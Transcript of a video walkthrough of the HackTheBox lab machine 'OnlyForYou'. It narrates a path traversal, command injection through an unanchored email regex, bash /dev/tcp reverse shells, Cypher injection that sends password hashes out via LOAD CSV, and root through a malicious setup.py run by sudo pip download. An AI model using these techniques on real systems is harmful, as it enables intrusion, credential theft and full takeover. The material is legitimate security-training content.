What's going on YouTube? This is Ipsec. I'm doing OnlyForYou from HackTheBox, which was a really fun box that had probably four main components. The first is a file disclosure vulnerability in a web server that leaks some source code. Then you find a RCE vulnerability in a DNS lookup that it's using to pull probably MX records from an email. And the vulnerability there is it's using Re.Match to match an email address to make sure it is email and there's no bad characters. The downside is the match command without a terminator will only match the beginning of the string. So you can put malicious characters at the end, bypass that check, and get code execution. Once on the box, you can access another web server that's vulnerable to Neo4j Injection, which is very similar to SQL injection. And then the root step involves abusing a pip download, because pip download will actually execute setup.py, and you can get root that way. So let's just jump in. As always, start with an nmap, so -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it OnlyForYou, and then the IP address of 10.10.11.210. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80, its banner tells us it's nginx running on Ubuntu, and it's giving us the domain onlyforyou.htb. So I'm going to go ahead and add this into my host file. So sudo v etc host, and then let's go put this at the bottom. So 10.10.11.210, onlyforyou.htb. And if we go to that website, 10.10.11.210, we'll see it directs us to onlyforyou.htb, which brings us to this web page. And it just looks like a boilerplate website. We can look around to see what they have. We have some testimonials here of some of their clients, I'm guessing. Going down to the services, doesn't really tell us exactly what they do. They have some cool products and betas to show, but nothing there. We have a team, so we could potentially formulate usernames if there was some type of login form to do brute forcing. We go to the frequently asked questions, and if we click around, we do see there is another domain, beta.onlyforyou.htb. And you could also got that through GoBuster if you just did GoBuster vhost-u onlyforyou.htb. Is it the number 4? It is the number 4. Let's do etc host beta.onlyforyou.htb. Okay. GoBuster vhost-u onlyforyou.htb. Word list, op, sec list, discovery, DNS, was it subdomains, top, million, 5,000.txt. And this will also find beta.onlyforyou.htb as well. So there's two ways to get to the beta domain. If we go there, beta.onlyforyou.htb. Yes, take me to that one. We can see it's a beta site. There's nothing really here. We have a few links, resize that lets us upload an image, and then image converter. So there's two different URLs, but I'm more interested in the source code since they're going to give it to us. So let's save source, and I'm going to move download source.zip here, and we can just unzip it, go into the directory, and I'm going to open up Visual Studio Code on this directory and then scan it with Snyk to see if it finds any vulnerabilities. We could also just look for vulnerabilities manually, but who has time for that nowadays? I always love using Snyk for very first pass. So if we go over here, we see Code Security has found 8 vulnerabilities. We have this one high. This is a path traversal that allows reading arbitrary files. And then we have some that are just open redirect vulnerabilities. But I'm going to look at the file disclosure vulnerability first, because that's the highest vulnerability and we can potentially read a file, right? So we have the route download, and it's going to get the file name. If 2 periods are in the file name or it starts with .. then it's going to say hacking detected and redirect us back to list. However, if ... or .. is not in, it's going to load that image. And as it loads, this is where the vulnerability comes from. We can see file name. This is user input. There's not much sanitization. I guess you could call this ... as sanitization, but there is a way around this. This os.path.join. The easiest way to explain this is just do a live demo real quick. So let's open up Python, import os, and see what os.path.join is. If we give it /etc and we say passwd, it's going to build a path off of that. If we do like please/subscribe, again, it's going to build that path. So it's really like a concatenation statement, or if I said that correctly. But if you think of it as concat, then you're going to fall for this vulnerability, because if you begin this path with a slash, it's going to overwrite this, which is weird. If we went back and did like .. you can see it doesn't go up one directory. It's only affected by the slash at the beginning. So we have a way now to bypass this hacking detected thing and return any file on the server. And here send file is going to send us the file back. So we have to get to this /download page. We could probably create the request manually, but we could also just do a find in files for /download to see where it's used. And we see the list.html has a form that has it. And if we look at where list.html is included, we can see it's on the route/list. I think if we uploaded a image on converter resize, it would also do it, but I'm just going to go cheat and go straight to /list. Let's send this intercept request. Intercept is on. Click here and send this to repeater. So we have the image. If we did ... slashes, we're going to see hacking detected. It's redirecting us. I don't know where it says it. It probably will display it on the next message. But if we got rid of these and just did the straight slash, we have the file. And now the first thing I would generally probably try to go grab is like proc self environ and look at the environment variables. Is that it? Let's see. Cat self, proc self. I did that. Environ. environ. envir. Okay. We probably need to set the length of something. So I'm going to try one thing, and that is setting a range header. If this doesn't work, I'll move on, because you don't actually need to read this file. It's just something I would normally do. And sometimes with file disclosure vulnerabilities, you just can't read some files, which sucks, but that's just how it is. So I'm not sure why we can't read this. It may be some setting on the actual box. Can I read maps? Let's see. Map. So if the file doesn't exist, we do get a redirect. So we're getting the file exist, and it's just, for some reason, not getting the special file. Maybe there's a configuration we don't actually have permission to it. We could go in CWD and get app.py, and this will get the source code, but we already have the source code. A directory or a file I normally like trying to get is like env or .env to get the file that loads the environment variables. We're not really getting anywhere here. There is another website on this, which was the onlyforYou.htb. So I'm going to go and try to get that website. So do Etsy nginx sites available, and then let's start with default. And here we go. We have it in var www onlyforYou.htb. And if default didn't exist, I would try like OnlyForYou, beta.onlyforYou.htb, try a bunch of file names based upon the website, because that's generally what it is. And it may also end in .conf. But we got lucky. It was just default, which is the easiest. So we can just go var www onlyforYou.htb. And I'm going to guess it's a Python website. It looks like it is. And here we have it. So let's save this site. copy to file. Let's go to OnlyForYou, and this will be app.py, and we can v this file. Let's see, let's delete all of this. And we have from form send message. So there is a form.py. And looking through this, email subject message IP, status send message 404. So the only real thing in this is the send message thing. And I don't see a vulnerability in this code. So let's go grab form.py. So instead of app.py, we can do form.py. And then save item, form.py, save it. And then let's edit form.py. That is how it's saved in like Burp Suite format. I want copy to file. Okay. And delete the header. And if we look through this, we do see a command injection vulnerability right here on this run command. And it's actually shell subprocess.run because we see from some process import pipe and run. So this is really subprocess.run. And because shell is true, it's just treating this as like os.system. And we got the domain here. So they're doing a DNS lookup TXT records for this, probably to verify like maybe like that's SPF lookup or something like that, or maybe get the MX records. It's doing things with DNS. And it's just passing it over to dig on the shell. And we have before that, it's looking at this regular expression and doing a match query. And that's only going to match the beginning to this .com or whatever, right? So this piece right here is making sure it's alphanumerical with few characters. And then there's a @ sign. And then again, alphanumerical. And then a period, and then just alpha with up to 3 characters, I believe this is, or 2 or more is that. What is this exactly? Let's see. I don't know regular expressions super well. I thought it'd only be 3, but I don't know why it says 2 there. So let's just go to regex tester, go to Google. I am proxying this. I think it's regex101.com. Yep. So we can go here, insert this expression. So I'm only curious about this, which you can't read that well. There we go. We want to match this. So .com, it's matched. So it's matching anything greater than 2. .c is not matched. So .co is. So I guess maybe a TLD can't be a single character. But that's what it's doing. We could also highlight over it, and that's the quantifier 2 and unlimited times. But the point of this being, the match command is only matching the beginning of the string, and we can validate that. So let's copy this. This def is secure real quick. Let's go Python 3, put this in. Let's do print not matched. And I really hope these are spaces, not tabs. Print matched. Okay, so we just copied that is secure function. So if we call it, so is secure on root at ipsec.rocks, we have to give it an IP. I'll just give it nothing because we're not using this piece of the function yet. We need to import regular expressions. We get matched because this is an email. If we put a special character at the beginning that's not in that regex, it's not matched. If we put it at the end, it is matched. So that's going to be the exploit in this. Because I remove that. Because it's not actually using the regex to pull the domain, Like if it had used regex to split this and got everything between the @ sign and this, then it would have pulled the domain securely. But all it's using regex for is input validation. And it's saying, okay, you bypass this. You don't have any special characters here that can result in command injection. Let's go on to the next thing. And it just calls the split command to split on this @ and then the right side of the @ is the domain. So because we can bypass this by just appending things, we can put malicious things in this. So if we do, let's see, a semicolon sleep 1, then when it pulls a domain, it's going to split here, and it's going to do a dig command on this command. I'm going to do probably curl, and we'll try curl first on 10.10.14.8, and we can do port 8000. And we'll see this is matched again because the regex only matches from the beginning of the string. So let's go find that form and test this code execution piece out. I'm guessing it's under contact. We have it here. So we'll do ipsec root @ ipsec.rocks curl 10.10.14.8 8000 subject test. Let us just intercept this so we can modify the query pretty easily. Send a message. Oh, we have some user validation there, or client-facing validation. Send it. Go in the repeater tab. Put this in. I'm going to URL encode by highlighting and pressing Control-U. And then let's just do nclvnp 8000. Send this request. We see it is taking a long time, and we have the curl request. So what I'm going to do actually is try to send a reverse shell first. So we'll do --i dev tcp 10.10.14.8 9001 0 and 1 like that. base64-w0. And I'm going to go ahead and make this just alphanumerical, get rid of the special characters because I can. So putting a space here, just eyeballing in the base64, we'll change that piece. Now we want to change this. I'm guessing that is before the 0 there. And there we go. We have just a base64 alphanumerical string. The whole reason is sometimes when I send this and I don't URL encode this plus, it converts this to a space and then breaks the base64. So I always just like making sure my payload is as simple as possible. No reason to introduce bad characters when I don't have to, or dangerous characters, I should say. So now we can do echo-n, paste this in, base64-d, and then we can just do bash, I guess. And I can safely URL encode this whole thing. Let's do nclvnp 9001. Send this. It is hanging, which is a good sign because we have a shell. So Python 3-c import pty. Wow, I cannot type right now. pty.spawn bin bash. Control Z, stty raw minus echo fg enter enter. And then we can export term is equal to x term so we can clear the screen. And now with our shell, we can look at our environment variables. There's nothing really that interesting. We can see the server software one as gunicorn. That's like the only non-standard one I see. Let's go and see if there's any databases. So this one is just an application in a form. There's definitely no database here. If we go to the beta, let's see, do lsla. I don't think there was a database here either. This is, remember, just like the image upload thing. So we can look at running ports with ss-lntp, and we see there are a few ports that we don't have access to. We got port 3000. We don't know what this is. 8001, 33060, which is probably MySQL, and 3306, which is also MySQL. So we don't know what application's using this. I'm guessing either 3000 or 8001 use MySQL. It's not running as the www data user, so we can't see what process it is. We could just upload Chisel right away and identify what website's running there. Most normally, like 3000 is going to be probably a Ruby web server, I would guess, and 8000 is just another Python or whatever, right? But we can go probably to Etsy and grep for 8001. And we want to do a -r for recursive. So we go in all files and we'll do to dev null. So we hide all error messages. And we can see there is a service called internal.service that binds on port 8001. It's another G unicorn thing. So I'm going to cat this and we'll just see what it is. User is dev, group is dev, and it's running out of opt internal app. If we look at opt, we have GOGS and internal app. I think this is Golang, not Ruby on 3000. So maybe Ruby is port 5000. I always forget what most like default web servers run on. But we've got GOGS and internal app. We can't go in them because only the dev user can, and we are dub data. If we do a group, or is it groups, we are not a member of that group, so we can't see those. I'm guessing GOGS is 3000. We could find it the same way with the grep-r 3000 and then hide error messages because there's a lot of things in Etsy we just don't have permission to. And let's see, 3000 is used quite often here. Maybe we can do like :3000. And that doesn't find anything. So I wonder if we do grep-r GOGS. Let's hide error messages. There we go. We can see the GOGS service has a working directory of opt GOGS, so it's probably this service. So we can just cat it again. To look at it, we got GOGS service. User again is dev. And yeah, there's not much going on there. So what we should do now is set up some port forwards. So let's go copy Chisel. So I'm going to make dir dub, and then we can cp /opt is it Chisel to this directory, and then we can run it in server mode. And we're going to do port 8050, I guess. I normally do 8001 but I'm actually going to want to forward port 8001, so that's why I did 8050. So we should also go in dub and start a web server. Chisel, it's downloading. Let's see. There's also a port 7687 and 7474. I want to say this is generally Neo4j. It's only listening on localhost, so it's not bound to everything. If we do localhost 7474, we can see that is indeed Neo4j. So let's see. Let's make Chisel executable. And then we want to do client 10.10.14.8. I listened on 8050. And I screwed up a few things here because we need to add the -- reverse flag to allow reverse port forwards. So do reverse 3000, forward it to 127.0.0.1, 3000. And then we want to also do 8001, 127.0.0.1, 8001. And I forgot to put AR first. Okay, we can see our proxy is listening. So we have port 3000, 8001, and I could have used a SOCKS proxy. The reason why I didn't is because I just hate configuring Burp Suite to use a SOCKS proxy. I'd rather just have my local host do it. So I can do 127.0.0.1, port 3000, and this should show us GOGS, and we can do 8001. And what I meant by that comment with Burp Suite before is if we did a SOCKS proxy here, then we configure a web browser to do a SOCKS, And then when we want to use Burp Suite, we then have to go all the way in Burp Suite, configure this to do socks, and configure a browser to do Burp Suite, and like double proxy it that way, which isn't that bad, but I just find this easier. So we have a login form. I'm going to just try admin. Generally, the first thing I always try when I get a login form, and we get into the application. We have a few tasks. It says check email, make appointment with new clients, migrate to new database, Neo4j, ask backend developer if everything is finished and tested. So I'm guessing this is a Neo4j database. If we go to the dashboard, I'm just going to search for A, and we see a few usernames that all have A in them. If we do Z, we get nothing. So right now, I'm guessing this is a Neo4j query just based upon the to-do comment, and that it's doing a contains query, which is just saying, if this field contains a letter that's in the name, then show it. I bet we could do J. And then, like, let's see, Jepson, Johnson, those will be shown, but like Presley Davis will not, right? There we go. So this appears to work. Let's try London. I was checking if it matched the city. So what we can guess now is the cipher query is like, let's see, I'm trying to think how to example cipher query. Querying with cipher. Let's see. So it's probably match P person where it contains the letter and then return P or something like that. There's contains here. That's not really that important. So let's just go over into Burp Suite so we can play with this query. So let's go proxy intercept on. I'm going to go A, center repeater. We have this. It's kind of hard to read this HTML, but we got usernames here. If I do a single quote, we got a internal server error. So we know we caused the application to crash. And unlike MySQL, there is something that comes after this. Again, like the query example, it's always going to be match something, and we're injecting like right here, and then it returns. So since we're injecting somewhere here, if we just put a comment, then it wouldn't like have this return statement and the whole thing would crash. And I'm not even sure if we could get this to work. I want to say a double slash is comment in Neo4j. Neo4j comment. We probably should take Burp Suite off, or this is going to go slow. Comment cipher, yeah, 2 slashes. So we could fool around with this, trying to get the query to not 500 error. Maybe we have to do like this. Maybe it's not you, it could be P for person or something. But this really isn't too important. We could try or 1 equals 1. And what we have to do is make sure we have an open quote here. And this returns, let's see, let's go back to this. And I'm going to do Z because Z returned no one, right? Let's refresh this page. Z should return no one. So if we do Z single quote or 1 equals 1, and the reason why I said we have to do a single quote and not end it is because the server is adding this one single quote to terminate this parameter. So now if we do the search, we'd return everything. So we have definitely confirmed there is some type of injection here. We're pretty sure it's Neo4j. So we did the or 1 equals 1. So now let's go over to Google and search cipher injection. I'm going to see if there's a HackTricks page on this, because this is generally my first stop when I go look for any type of exploitation. And we do see a bunch of various injections here. Let's see, we got injection, POC, extracting server version. It's going to use LOAD CSV to make an out-of-band request. And this may be confusing, but let's just run this first one real quick, and then hopefully it makes sense right after we run it. So I'm going to paste this, and then we want to edit our IP address. So 10.10.14.8, 8000. Make sure we are listening still. We are right here. And then I'm just going to highlight URL encode, and it errored out. Let's see. 10.10.14.8. A or 1 equals 1 with 1, call. I am not sure why this errored. So if we just do A, everything's redirecting. Did our session timeout? Because this one definitely should not have. I'm going to guess our session timed out. Let's refresh this page. Log in with admin. Go to employees. Okay, that works. Let's intercept another one. So something happened with our session there. Okay. I'm going to go to this. Let's see. Is it on my clipboard still? It is. 10.10.14.8. That looks good. We have a 500 error. But if we look here, we have a query from the server, version 560, name Neo4j edition community. So we have just done the out-of-band injection to get database information. So the next step in this is to start extracting actual data. And to start off, we're going to do this one. And labels, this is kind of like tables, I guess. Or maybe, yeah, tables, I think would be the closest thing that you'd be familiar with. So let's grab this. Go over to Burp Suite. And then I'm going to paste this one in. And we don't have this squiggly parentheses, so I'm just going to get rid of it. And then we want to do 10.10.14.8, 8000. And then send this query. It's going to 500 error again. And I was hoping we would get the stuff we want. Maybe we have to end it with a comment. That took longer, and there we go. So we have user and employee. So again, all I did was I put 2 slashes there. So this query ends on a comment. So when the server appends the single quote return something, it does nothing. So let's get information about this user table. So what we can do here is, let's see, I'm going to get rid of up to here where it says load CSV. Actually, let's Control-Shift-U and go up to this, and we're going to match the user with distinct keys U as K. And what we're going to get is each field in this, right? So what we're here is pretty much just saying what is inside this user label. Load CSV, and we can change this L is K. And let's see, we just need to do the first item, K0. Let's see if this works. I'm not positive if it will. We have password. So let's do K1 to get the second item. Username. K2. And we have no more. So we have just enumerated, there are 2 tables, user and employee, and user has the fields, password, and username. We could go and try employee as well. So I'm just going to open up a new tab, and let's see, employee. This is just the label we're creating, the U, or variable, I should say, not label. So if we wanted to, we could put this as EE for both of them, but I'm not going to worry about that. Let's do K0. Send this. City, salary, country, name city. See, we're just getting all the fields in the employee. But what we really want is just usernames and passwords, right? Because credentials is what we are after. So let's just match you. And it was username, right? Or just user. Okay. And what we want to do is with distinct. And we can get rid of this. And we can say u.username plus a semicolon u.password. And then we just give it a name. We'll do as A, I guess. Load CSV. And then let's just put A here, because we've assigned this to be A. And Control U. We have two requests, admin and John. So let's now see how long this hash is. Echo-n, wc-c, 64 characters. Is that a SHA-1 sum? SHA-1 sum. Should echo first. Awk print 1. wc-c, 41. Maybe 256 sum. Yeah, it's probably this, because we have a line break here. So 64 characters plus a line break. So this is probably a SHA-256 sum. Let's just go to CrackStation first, since these are unsalted hashes. Or at least I'm assuming they're unsalted hashes. So CrackStation. And then if we don't crack them, then we can go throw them into the cracker, or a hashcat. Grab this. So this is going to be admin, and the other one, I am not a robot, crack hashes. And we have 86C is equal to admin, and A85 is equal this is for you. And if we look at that, the 85 was John. And if we go to the box and cat etsy pass wd, grep everything that ends in sh for shells, John is a user. So let's just try sh John at 10, 10, 11. Is it 210? Yes. Get rid of everything. This. Hold on, let me make sure I copy this. That is the correct thing on my clipboard. Paste it in. And we can log in as John. So if we do a SSL or a sudo-l now, we can see I can run pip3 download 127.0.0.1 port 3000 tar.gz. So this is the get t instance, or GOGS actually it was, not get t. We already looked at port 3000. And a little known thing about download, you'd think it would just download an application, but it will actually download and execute setup.py inside of it. So I'm guessing we have to log into GOGS now, and then create a repository and have it download tar.gz and have it execute is my guess. So since I killed my Chisel already, I'm going to do it with just SSH. So 3000, 127.0.0.1, 3000. So we just re-forwarded the port. So I can go to 127.0.0.1, port 3000, and get to GOGS. And I'm going to try logging in with John, and this is for you. We can. So we have a repo here. So now the theory is we have to create a repo, have this be like a release or something, so there's a tar.gz file we can download, and have that actually have a malicious setup.py where it will execute code when it downloads it. So first we have to go build a skeleton package. I'm just going to Google package manager python install RCE. And I think that's going to get me to a blog post that goes over this. We see this whole thing talks about it. I'm just going to git clone. Let's do it on our machine. Let's see. I can kill Chisel. And we can go to www. We already are there. Let's just git clone. Let's see. I did git clone, git clone. There we go. Let's go. This is fine. And then I'm just going to edit the setup.py. And instead of this print hello pwned, let's just do import os. And we can send a reverse shell. So os.system. And I guess I probably should have like Googled a Python reverse shell, but I'm lazy, right? So we can do this dev tcp 10.10.14.8 9001 0 and 1. So this should now send a reverse shell when it runs. I'm just eyeballing it to make sure it looks good. And then we can do, is it pip3 build to build it? Let's see, what's the blog post say? We do this, python-m build. Let's see, the next step is bundle up the package. We probably need setup tools or something. Make sure to have setup tools and build. pip3 install setup tools and build. Okay. So now we can build this. And there should be a tar inside of this once we build it. And that's going to be what we upload to the GOGS repository. So if we go in dist, we see this is fine, tar.gz. So I'm going to copy that up to directories. We need to specify .tar.gz. And that's just a tar package of what we just built. And the download is going to run this setup.py, which does send a reverse shell. So let us get out of this shell, type reset, nclvmp 9001. There we go. I guess I could have ran the reverse shell there. So now we want to go to this repository. Doesn't exist. I guess we are signed out now. John, this is for you. Awesome. Go to the repository. We should be able just to upload a file. And then let's go ipsec htb. And this is OnlyForYou. Dub. There we go. Let's commit to master. And let's grab raw. Let's make sure we can download this. We get a 404 not found. And that's probably because this is a private repository. So let's change this to be public. So we can now download the file. So let's do sudo-l, sudo user bin pip3 download http 127.0.0.1 3000. And then we're going to specify this file. It downloaded, and there we go. We see the shell sent to us. So we can go to root, and get root.txt. And with that, that's going to be the box. So hopefully you guys enjoyed it. I know this looked like really intuitive, but before doing this box, I did not know that the download command in pip would actually download and execute setup.py. That is not intuitive to me. So definitely learn that trick doing this box. Take care, guys, and I will see you all next time.